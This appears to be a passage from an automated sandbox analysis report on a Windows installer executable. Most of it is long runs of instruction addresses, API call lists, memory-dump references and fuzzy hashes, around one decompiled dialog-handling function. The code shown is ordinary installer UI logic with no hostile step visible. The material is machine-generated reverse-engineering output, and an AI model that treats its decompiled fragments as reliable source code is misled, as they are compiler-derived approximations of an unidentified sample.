                                                                                                                                                                                                          0x00405277
                                                                                                                                                                                                          0x0040527f
                                                                                                                                                                                                          0x00405290
                                                                                                                                                                                                          0x00405290
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040527f
                                                                                                                                                                                                          0x004051c5
                                                                                                                                                                                                          0x004051c8
                                                                                                                                                                                                          0x004051ce
                                                                                                                                                                                                          0x004051d3
                                                                                                                                                                                                          0x004051d5
                                                                                                                                                                                                          0x004051d7
                                                                                                                                                                                                          0x004051dd
                                                                                                                                                                                                          0x004051e4
                                                                                                                                                                                                          0x004051e9
                                                                                                                                                                                                          0x004051f0
                                                                                                                                                                                                          0x004051f3
                                                                                                                                                                                                          0x004051f3
                                                                                                                                                                                                          0x004051fa
                                                                                                                                                                                                          0x00405206
                                                                                                                                                                                                          0x0040520a
                                                                                                                                                                                                          0x0040520c
                                                                                                                                                                                                          0x0040520c
                                                                                                                                                                                                          0x004051fc
                                                                                                                                                                                                          0x004051fe
                                                                                                                                                                                                          0x004051fe
                                                                                                                                                                                                          0x0040522c
                                                                                                                                                                                                          0x00405238
                                                                                                                                                                                                          0x00405247
                                                                                                                                                                                                          0x00405247
                                                                                                                                                                                                          0x00405249
                                                                                                                                                                                                          0x0040524c
                                                                                                                                                                                                          0x00405255
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040515c
                                                                                                                                                                                                          0x00405167
                                                                                                                                                                                                          0x0040516a
                                                                                                                                                                                                          0x0040516f
                                                                                                                                                                                                          0x00405171
                                                                                                                                                                                                          0x00405175
                                                                                                                                                                                                          0x00405185
                                                                                                                                                                                                          0x0040518f
                                                                                                                                                                                                          0x00405191
                                                                                                                                                                                                          0x00405194
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405177
                                                                                                                                                                                                          0x00405177
                                                                                                                                                                                                          0x0040517d
                                                                                                                                                                                                          0x0040517f
                                                                                                                                                                                                          0x0040517f
                                                                                                                                                                                                          0x00405180
                                                                                                                                                                                                          0x00405181
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00405177
                                                                                                                                                                                                          0x0040515a
                                                                                                                                                                                                          0x00405135
                                                                                                                                                                                                          0x00405078
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040508e
                                                                                                                                                                                                          0x00405098
                                                                                                                                                                                                          0x0040509d
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004050af
                                                                                                                                                                                                          0x004050b4
                                                                                                                                                                                                          0x004050c0
                                                                                                                                                                                                          0x004050c0
                                                                                                                                                                                                          0x004050c2
                                                                                                                                                                                                          0x004050d1
                                                                                                                                                                                                          0x004050d3
                                                                                                                                                                                                          0x004050d7
                                                                                                                                                                                                          0x004050da
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004050da
                                                                                                                                                                                                          0x00405078
                                                                                                                                                                                                          0x00404d2c
                                                                                                                                                                                                          0x00404d2f
                                                                                                                                                                                                          0x00404d32
                                                                                                                                                                                                          0x00404d42
                                                                                                                                                                                                          0x00404d55
                                                                                                                                                                                                          0x00404d60
                                                                                                                                                                                                          0x00404d66
                                                                                                                                                                                                          0x00404d74
                                                                                                                                                                                                          0x00404d87
                                                                                                                                                                                                          0x00404d8c
                                                                                                                                                                                                          0x00404d97
                                                                                                                                                                                                          0x00404da0
                                                                                                                                                                                                          0x00404db6
                                                                                                                                                                                                          0x00404dc6
                                                                                                                                                                                                          0x00404dd2
                                                                                                                                                                                                          0x00404dd2
                                                                                                                                                                                                          0x00404dd7
                                                                                                                                                                                                          0x00404ddd
                                                                                                                                                                                                          0x00404ddf
                                                                                                                                                                                                          0x00404de2
                                                                                                                                                                                                          0x00404de7
                                                                                                                                                                                                          0x00404dec
                                                                                                                                                                                                          0x00404dee
                                                                                                                                                                                                          0x00404dee
                                                                                                                                                                                                          0x00404e0e
                                                                                                                                                                                                          0x00404e0e
                                                                                                                                                                                                          0x00404e10
                                                                                                                                                                                                          0x00404e11
                                                                                                                                                                                                          0x00404e16
                                                                                                                                                                                                          0x00404e1c
                                                                                                                                                                                                          0x00404e20
                                                                                                                                                                                                          0x00404e25
                                                                                                                                                                                                          0x00404e2d
                                                                                                                                                                                                          0x00404e31
                                                                                                                                                                                                          0x00404e36
                                                                                                                                                                                                          0x00404e3b
                                                                                                                                                                                                          0x00404e43
                                                                                                                                                                                                          0x00404e46
                                                                                                                                                                                                          0x00404f15
                                                                                                                                                                                                          0x00404f28
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00404e4c
                                                                                                                                                                                                          0x00404e4f
                                                                                                                                                                                                          0x00404e52
                                                                                                                                                                                                          0x00404e55
                                                                                                                                                                                                          0x00404e55
                                                                                                                                                                                                          0x00404e5a
                                                                                                                                                                                                          0x00404e63
                                                                                                                                                                                                          0x00404e66
                                                                                                                                                                                                          0x00404e6a
                                                                                                                                                                                                          0x00404e6d
                                                                                                                                                                                                          0x00404e70
                                                                                                                                                                                                          0x00404e79
                                                                                                                                                                                                          0x00404e82
                                                                                                                                                                                                          0x00404e85
                                                                                                                                                                                                          0x00404e88
                                                                                                                                                                                                          0x00404e8b
                                                                                                                                                                                                          0x00404ec9
                                                                                                                                                                                                          0x00404ef4
                                                                                                                                                                                                          0x00404ecb
                                                                                                                                                                                                          0x00404eda
                                                                                                                                                                                                          0x00404eda
                                                                                                                                                                                                          0x00404e8d
                                                                                                                                                                                                          0x00404e90
                                                                                                                                                                                                          0x00404e9e
                                                                                                                                                                                                          0x00404ea8
                                                                                                                                                                                                          0x00404eb0
                                                                                                                                                                                                          0x00404eb7
                                                                                                                                                                                                          0x00404ec2
                                                                                                                                                                                                          0x00404ec2
                                                                                                                                                                                                          0x00404e8b
                                                                                                                                                                                                          0x00404efa
                                                                                                                                                                                                          0x00404efb
                                                                                                                                                                                                          0x00404f07
                                                                                                                                                                                                          0x00404f07
                                                                                                                                                                                                          0x00404f13
                                                                                                                                                                                                          0x00404f2e
                                                                                                                                                                                                          0x00404f31
                                                                                                                                                                                                          0x00404f4e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00404f33
                                                                                                                                                                                                          0x00404f38
                                                                                                                                                                                                          0x00404f41
                                                                                                                                                                                                          0x004052d3
                                                                                                                                                                                                          0x004052e5
                                                                                                                                                                                                          0x004052e5
                                                                                                                                                                                                          0x00404f31
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00404f13
                                                                                                                                                                                                          0x00404e46

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404CED
                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000408), ref: 00404CFA
                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404D49
                                                                                                                                                                                                          • LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404D60
                                                                                                                                                                                                          • SetWindowLongA.USER32 ref: 00404D7A
                                                                                                                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D8C
                                                                                                                                                                                                          • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404DA0
                                                                                                                                                                                                          • SendMessageA.USER32 ref: 00404DB6
                                                                                                                                                                                                          • SendMessageA.USER32 ref: 00404DC2
                                                                                                                                                                                                          • SendMessageA.USER32 ref: 00404DD2
                                                                                                                                                                                                          • DeleteObject.GDI32(00000110), ref: 00404DD7
                                                                                                                                                                                                          • SendMessageA.USER32 ref: 00404E02
                                                                                                                                                                                                          • SendMessageA.USER32 ref: 00404E0E
                                                                                                                                                                                                          • SendMessageA.USER32 ref: 00404EA8
                                                                                                                                                                                                          • SendMessageA.USER32 ref: 00404ED8
                                                                                                                                                                                                            • Part of subcall function 00404306: SendMessageA.USER32 ref: 00404314
                                                                                                                                                                                                          • SendMessageA.USER32 ref: 00404EEC
                                                                                                                                                                                                          • GetWindowLongA.USER32(?,000000F0), ref: 00404F1A
                                                                                                                                                                                                          • SetWindowLongA.USER32 ref: 00404F28
                                                                                                                                                                                                          • ShowWindow.USER32(?,00000005), ref: 00404F38
                                                                                                                                                                                                          • SendMessageA.USER32 ref: 00405033
                                                                                                                                                                                                          • SendMessageA.USER32 ref: 00405098
                                                                                                                                                                                                          • SendMessageA.USER32 ref: 004050AD
                                                                                                                                                                                                          • SendMessageA.USER32 ref: 004050D1
                                                                                                                                                                                                          • SendMessageA.USER32 ref: 004050F1
                                                                                                                                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 00405106
                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 00405116
                                                                                                                                                                                                          • SendMessageA.USER32 ref: 0040518F
                                                                                                                                                                                                          • SendMessageA.USER32 ref: 00405238
                                                                                                                                                                                                          • SendMessageA.USER32 ref: 00405247
                                                                                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00405271
                                                                                                                                                                                                          • ShowWindow.USER32(?,00000000), ref: 004052BF
                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003FE), ref: 004052CA
                                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 004052D1
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                          • String ID: $M$N
                                                                                                                                                                                                          • API String ID: 2564846305-813528018
                                                                                                                                                                                                          • Opcode ID: 522b9aef29dd3697019702309650a8f995276aa537964cdbeefa37b65f42cde9
                                                                                                                                                                                                          • Instruction ID: 815a2de4fdf1bcdeb3ef1062daa1c2d9177896ce2fe1d13919dbb69bdfef4a57
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 522b9aef29dd3697019702309650a8f995276aa537964cdbeefa37b65f42cde9
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 21027BB0A00209AFDB20DF94DD45AAE7BB5FB44314F50817AF610BA2E0C7799E52CF58
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00403DFD, Relevance: 48.3, APIs: 32, Instructions: 346windowstringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 84%
                                                                                                                                                                                                          			E00403DFD(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t68;
				struct HWND__* _t74;
				signed int _t87;
				struct HWND__* _t92;
				signed int _t100;
				int _t104;
				signed int _t116;
				signed int _t117;
				int _t118;
				signed int _t123;
				struct HWND__* _t126;
				struct HWND__* _t127;
				int _t128;
				long _t131;
				int _t133;
				int _t134;
				void* _t135;
				void* _t143;

				_t116 = _a8;
				if(_t116 == 0x110 || _t116 == 0x408) {
					_t35 = _a12;
					_t126 = _a4;
					__eflags = _t116 - 0x110;
					 *0x42a8a0 = _t35;
					if(_t116 == 0x110) {
						 *0x42f448 = _t126;
						 *0x42a8b4 = GetDlgItem(_t126, 1);
						_t92 = GetDlgItem(_t126, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x429880 = _t92;
						E004042D1(_t126);
						SetClassLongA(_t126, 0xfffffff2,  *0x42ec28);
						 *0x42ec0c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x42a8a0 = 1;
					}
					_t123 =  *0x40a1f8; // 0xffffffff
					_t134 = 0;
					_t131 = (_t123 << 6) +  *0x42f480;
					__eflags = _t123;
					if(_t123 < 0) {
						L34:
						E0040431D(0x40b);
						while(1) {
							_t37 =  *0x42a8a0;
							 *0x40a1f8 =  *0x40a1f8 + _t37;
							_t131 = _t131 + (_t37 << 6);
							_t39 =  *0x40a1f8; // 0xffffffff
							__eflags = _t39 -  *0x42f484;
							if(_t39 ==  *0x42f484) {
								E0040140B(1);
							}
							__eflags =  *0x42ec0c - _t134; // 0x0
							if(__eflags != 0) {
								break;
							}
							__eflags =  *0x40a1f8 -  *0x42f484; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t131 + 0x14);
							E004062E0(_t117, _t126, _t131, 0x437800,  *((intOrPtr*)(_t131 + 0x24)));
							_push( *((intOrPtr*)(_t131 + 0x20)));
							_push(0xfffffc19);
							E004042D1(_t126);
							_push( *((intOrPtr*)(_t131 + 0x1c)));
							_push(0xfffffc1b);
							E004042D1(_t126);
							_push( *((intOrPtr*)(_t131 + 0x28)));
							_push(0xfffffc1a);
							E004042D1(_t126);
							_t49 = GetDlgItem(_t126, 3);
							__eflags =  *0x42f4ec - _t134;
							_v32 = _t49;
							if( *0x42f4ec != _t134) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t49, _t117 & 0x00000008);
							EnableWindow( *(_t135 + 0x30), _t117 & 0x00000100);
							E004042F3(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x429880, _t118);
							__eflags = _t118 - _t134;
							if(_t118 == _t134) {
								_push(1);
							} else {
								_push(_t134);
							}
							EnableMenuItem(GetSystemMenu(_t126, _t134), 0xf060, ??);
							SendMessageA( *(_t135 + 0x38), 0xf4, _t134, 1);
							__eflags =  *0x42f4ec - _t134;
							if( *0x42f4ec == _t134) {
								_push( *0x42a8b4);
							} else {
								SendMessageA(_t126, 0x401, 2, _t134);
								_push( *0x429880);
							}
							E00404306();
							E0040624D(0x42a8b8, E00403DDE());
							E004062E0(0x42a8b8, _t126, _t131,  &(0x42a8b8[lstrlenA(0x42a8b8)]),  *((intOrPtr*)(_t131 + 0x18)));
							SetWindowTextA(_t126, 0x42a8b8);
							_push(_t134);
							_t68 = E00401389( *((intOrPtr*)(_t131 + 8)));
							__eflags = _t68;
							if(_t68 != 0) {
								continue;
							} else {
								__eflags =  *_t131 - _t134;
								if( *_t131 == _t134) {
									continue;
								}
								__eflags =  *(_t131 + 4) - 5;
								if( *(_t131 + 4) != 5) {
									DestroyWindow( *0x42ec18);
									 *0x42a090 = _t131;
									__eflags =  *_t131 - _t134;
									if( *_t131 <= _t134) {
										goto L58;
									}
									_t74 = CreateDialogParamA( *0x42f440,  *_t131 +  *0x42ec20 & 0x0000ffff, _t126,  *(0x40a1fc +  *(_t131 + 4) * 4), _t131);
									__eflags = _t74 - _t134;
									 *0x42ec18 = _t74;
									if(_t74 == _t134) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t131 + 0x2c)));
									_push(6);
									E004042D1(_t74);
									GetWindowRect(GetDlgItem(_t126, 0x3fa), _t135 + 0x10);
									ScreenToClient(_t126, _t135 + 0x10);
									SetWindowPos( *0x42ec18, _t134,  *(_t135 + 0x20),  *(_t135 + 0x20), _t134, _t134, 0x15);
									_push(_t134);
									E00401389( *((intOrPtr*)(_t131 + 0xc)));
									__eflags =  *0x42ec0c - _t134; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x42ec18, 8);
									E0040431D(0x405);
									goto L58;
								}
								__eflags =  *0x42f4ec - _t134;
								if( *0x42f4ec != _t134) {
									goto L61;
								}
								__eflags =  *0x42f4e0 - _t134;
								if( *0x42f4e0 != _t134) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x42ec18);
						 *0x42f448 = _t134;
						EndDialog(_t126,  *0x429c88);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t131 - _t134;
							if( *_t131 == _t134) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t87 = E00401389( *((intOrPtr*)(_t131 + 0x10)));
						__eflags = _t87;
						if(_t87 == 0) {
							goto L33;
						}
						SendMessageA( *0x42ec18, 0x40f, 0, 1);
						__eflags =  *0x42ec0c - _t134; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t126 = _a4;
					_t134 = 0;
					if(_t116 == 0x47) {
						SetWindowPos( *0x42a898, _t126, 0, 0, 0, 0, 0x13);
					}
					if(_t116 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x42a898,  ~(_a12 - 1) & _t116);
					}
					if(_t116 != 0x40d) {
						__eflags = _t116 - 0x11;
						if(_t116 != 0x11) {
							__eflags = _t116 - 0x111;
							if(_t116 != 0x111) {
								L26:
								return E00404338(_t116, _a12, _a16);
							}
							_t133 = _a12 & 0x0000ffff;
							_t127 = GetDlgItem(_t126, _t133);
							__eflags = _t127 - _t134;
							if(_t127 == _t134) {
								L13:
								__eflags = _t133 - 1;
								if(_t133 != 1) {
									__eflags = _t133 - 3;
									if(_t133 != 3) {
										_t128 = 2;
										__eflags = _t133 - _t128;
										if(_t133 != _t128) {
											L25:
											SendMessageA( *0x42ec18, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x42f4ec - _t134;
										if( *0x42f4ec == _t134) {
											_t100 = E0040140B(3);
											__eflags = _t100;
											if(_t100 != 0) {
												goto L26;
											}
											 *0x429c88 = 1;
											L21:
											_push(0x78);
											L22:
											E004042AA();
											goto L26;
										}
										E0040140B(_t128);
										 *0x429c88 = _t128;
										goto L21;
									}
									__eflags =  *0x40a1f8 - _t134; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t133);
								goto L22;
							}
							SendMessageA(_t127, 0xf3, _t134, _t134);
							_t104 = IsWindowEnabled(_t127);
							__eflags = _t104;
							if(_t104 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t126, _t134, _t134);
						return 1;
					} else {
						DestroyWindow( *0x42ec18);
						 *0x42ec18 = _a12;
						L58:
						if( *0x42b8b8 == _t134) {
							_t143 =  *0x42ec18 - _t134; // 0x0
							if(_t143 != 0) {
								ShowWindow(_t126, 0xa);
								 *0x42b8b8 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}































                                                                                                                                                                                                          0x00403e06
                                                                                                                                                                                                          0x00403e0f
                                                                                                                                                                                                          0x00403f50
                                                                                                                                                                                                          0x00403f54
                                                                                                                                                                                                          0x00403f58
                                                                                                                                                                                                          0x00403f5a
                                                                                                                                                                                                          0x00403f5f
                                                                                                                                                                                                          0x00403f6a
                                                                                                                                                                                                          0x00403f75
                                                                                                                                                                                                          0x00403f7a
                                                                                                                                                                                                          0x00403f7c
                                                                                                                                                                                                          0x00403f7e
                                                                                                                                                                                                          0x00403f81
                                                                                                                                                                                                          0x00403f86
                                                                                                                                                                                                          0x00403f94
                                                                                                                                                                                                          0x00403fa1
                                                                                                                                                                                                          0x00403fa8
                                                                                                                                                                                                          0x00403fa8
                                                                                                                                                                                                          0x00403fa9
                                                                                                                                                                                                          0x00403fa9
                                                                                                                                                                                                          0x00403fae
                                                                                                                                                                                                          0x00403fb4
                                                                                                                                                                                                          0x00403fbb
                                                                                                                                                                                                          0x00403fc1
                                                                                                                                                                                                          0x00403fc3
                                                                                                                                                                                                          0x00404003
                                                                                                                                                                                                          0x00404008
                                                                                                                                                                                                          0x0040400d
                                                                                                                                                                                                          0x0040400d
                                                                                                                                                                                                          0x00404012
                                                                                                                                                                                                          0x0040401b
                                                                                                                                                                                                          0x0040401d
                                                                                                                                                                                                          0x00404022
                                                                                                                                                                                                          0x00404028
                                                                                                                                                                                                          0x0040402c
                                                                                                                                                                                                          0x0040402c
                                                                                                                                                                                                          0x00404031
                                                                                                                                                                                                          0x00404037
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00404042
                                                                                                                                                                                                          0x00404048
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00404051
                                                                                                                                                                                                          0x00404059
                                                                                                                                                                                                          0x0040405e
                                                                                                                                                                                                          0x00404061
                                                                                                                                                                                                          0x00404067
                                                                                                                                                                                                          0x0040406c
                                                                                                                                                                                                          0x0040406f
                                                                                                                                                                                                          0x00404075
                                                                                                                                                                                                          0x0040407a
                                                                                                                                                                                                          0x0040407d
                                                                                                                                                                                                          0x00404083
                                                                                                                                                                                                          0x0040408b
                                                                                                                                                                                                          0x00404091
                                                                                                                                                                                                          0x00404097
                                                                                                                                                                                                          0x0040409b
                                                                                                                                                                                                          0x004040a2
                                                                                                                                                                                                          0x004040a2
                                                                                                                                                                                                          0x004040a2
                                                                                                                                                                                                          0x004040ac
                                                                                                                                                                                                          0x004040be
                                                                                                                                                                                                          0x004040ca
                                                                                                                                                                                                          0x004040cf
                                                                                                                                                                                                          0x004040d9
                                                                                                                                                                                                          0x004040df
                                                                                                                                                                                                          0x004040e1
                                                                                                                                                                                                          0x004040e6
                                                                                                                                                                                                          0x004040e3
                                                                                                                                                                                                          0x004040e3
                                                                                                                                                                                                          0x004040e3
                                                                                                                                                                                                          0x004040f6
                                                                                                                                                                                                          0x0040410e
                                                                                                                                                                                                          0x00404110
                                                                                                                                                                                                          0x00404116
                                                                                                                                                                                                          0x0040412b
                                                                                                                                                                                                          0x00404118
                                                                                                                                                                                                          0x00404121
                                                                                                                                                                                                          0x00404123
                                                                                                                                                                                                          0x00404123
                                                                                                                                                                                                          0x00404131
                                                                                                                                                                                                          0x00404142
                                                                                                                                                                                                          0x00404153
                                                                                                                                                                                                          0x0040415a
                                                                                                                                                                                                          0x00404160
                                                                                                                                                                                                          0x00404164
                                                                                                                                                                                                          0x00404169
                                                                                                                                                                                                          0x0040416b
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00404171
                                                                                                                                                                                                          0x00404171
                                                                                                                                                                                                          0x00404173
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00404179
                                                                                                                                                                                                          0x0040417d
                                                                                                                                                                                                          0x004041a2
                                                                                                                                                                                                          0x004041a8
                                                                                                                                                                                                          0x004041ae
                                                                                                                                                                                                          0x004041b0
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004041d6
                                                                                                                                                                                                          0x004041dc
                                                                                                                                                                                                          0x004041de
                                                                                                                                                                                                          0x004041e3
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004041e9
                                                                                                                                                                                                          0x004041ec
                                                                                                                                                                                                          0x004041ef
                                                                                                                                                                                                          0x00404206
                                                                                                                                                                                                          0x00404212
                                                                                                                                                                                                          0x0040422b
                                                                                                                                                                                                          0x00404231
                                                                                                                                                                                                          0x00404235
                                                                                                                                                                                                          0x0040423a
                                                                                                                                                                                                          0x00404240
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040424a
                                                                                                                                                                                                          0x00404255
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00404255
                                                                                                                                                                                                          0x0040417f
                                                                                                                                                                                                          0x00404185
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040418b
                                                                                                                                                                                                          0x00404191
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00404197
                                                                                                                                                                                                          0x0040416b
                                                                                                                                                                                                          0x00404262
                                                                                                                                                                                                          0x0040426e
                                                                                                                                                                                                          0x00404275
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00403fc5
                                                                                                                                                                                                          0x00403fc5
                                                                                                                                                                                                          0x00403fc8
                                                                                                                                                                                                          0x00403ffb
                                                                                                                                                                                                          0x00403ffb
                                                                                                                                                                                                          0x00403ffd
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00403ffd
                                                                                                                                                                                                          0x00403fca
                                                                                                                                                                                                          0x00403fce
                                                                                                                                                                                                          0x00403fd3
                                                                                                                                                                                                          0x00403fd5
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00403fe5
                                                                                                                                                                                                          0x00403fed
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00403ff3
                                                                                                                                                                                                          0x00403e21
                                                                                                                                                                                                          0x00403e21
                                                                                                                                                                                                          0x00403e25
                                                                                                                                                                                                          0x00403e2a
                                                                                                                                                                                                          0x00403e39
                                                                                                                                                                                                          0x00403e39
                                                                                                                                                                                                          0x00403e42
                                                                                                                                                                                                          0x00403e4b
                                                                                                                                                                                                          0x00403e56
                                                                                                                                                                                                          0x00403e56
                                                                                                                                                                                                          0x00403e62
                                                                                                                                                                                                          0x00403e7e
                                                                                                                                                                                                          0x00403e81
                                                                                                                                                                                                          0x00403e94
                                                                                                                                                                                                          0x00403e9a
                                                                                                                                                                                                          0x00403f3d
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00403f46
                                                                                                                                                                                                          0x00403ea0
                                                                                                                                                                                                          0x00403ead
                                                                                                                                                                                                          0x00403eaf
                                                                                                                                                                                                          0x00403eb1
                                                                                                                                                                                                          0x00403ed0
                                                                                                                                                                                                          0x00403ed0
                                                                                                                                                                                                          0x00403ed3
                                                                                                                                                                                                          0x00403ed8
                                                                                                                                                                                                          0x00403edb
                                                                                                                                                                                                          0x00403eeb
                                                                                                                                                                                                          0x00403eec
                                                                                                                                                                                                          0x00403eee
                                                                                                                                                                                                          0x00403f24
                                                                                                                                                                                                          0x00403f37
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00403f37
                                                                                                                                                                                                          0x00403ef0
                                                                                                                                                                                                          0x00403ef6
                                                                                                                                                                                                          0x00403f0f
                                                                                                                                                                                                          0x00403f14
                                                                                                                                                                                                          0x00403f16
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00403f18
                                                                                                                                                                                                          0x00403f04
                                                                                                                                                                                                          0x00403f04
                                                                                                                                                                                                          0x00403f06
                                                                                                                                                                                                          0x00403f06
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00403f06
                                                                                                                                                                                                          0x00403ef9
                                                                                                                                                                                                          0x00403efe
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00403efe
                                                                                                                                                                                                          0x00403edd
                                                                                                                                                                                                          0x00403ee3
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00403ee5
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00403ee5
                                                                                                                                                                                                          0x00403ed5
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00403ed5
                                                                                                                                                                                                          0x00403ebb
                                                                                                                                                                                                          0x00403ec2
                                                                                                                                                                                                          0x00403ec8
                                                                                                                                                                                                          0x00403eca
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00403eca
                                                                                                                                                                                                          0x00403e86
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00403e64
                                                                                                                                                                                                          0x00403e6a
                                                                                                                                                                                                          0x00403e74
                                                                                                                                                                                                          0x0040427b
                                                                                                                                                                                                          0x00404281
                                                                                                                                                                                                          0x00404283
                                                                                                                                                                                                          0x00404289
                                                                                                                                                                                                          0x0040428e
                                                                                                                                                                                                          0x00404294
                                                                                                                                                                                                          0x00404294
                                                                                                                                                                                                          0x00404289
                                                                                                                                                                                                          0x0040429e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040429e
                                                                                                                                                                                                          0x00403e62

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E39
                                                                                                                                                                                                          • ShowWindow.USER32(?), ref: 00403E56
                                                                                                                                                                                                          • DestroyWindow.USER32 ref: 00403E6A
                                                                                                                                                                                                          • SetWindowLongA.USER32 ref: 00403E86
                                                                                                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00403EA7
                                                                                                                                                                                                          • SendMessageA.USER32 ref: 00403EBB
                                                                                                                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 00403EC2
                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 00403F70
                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000002), ref: 00403F7A
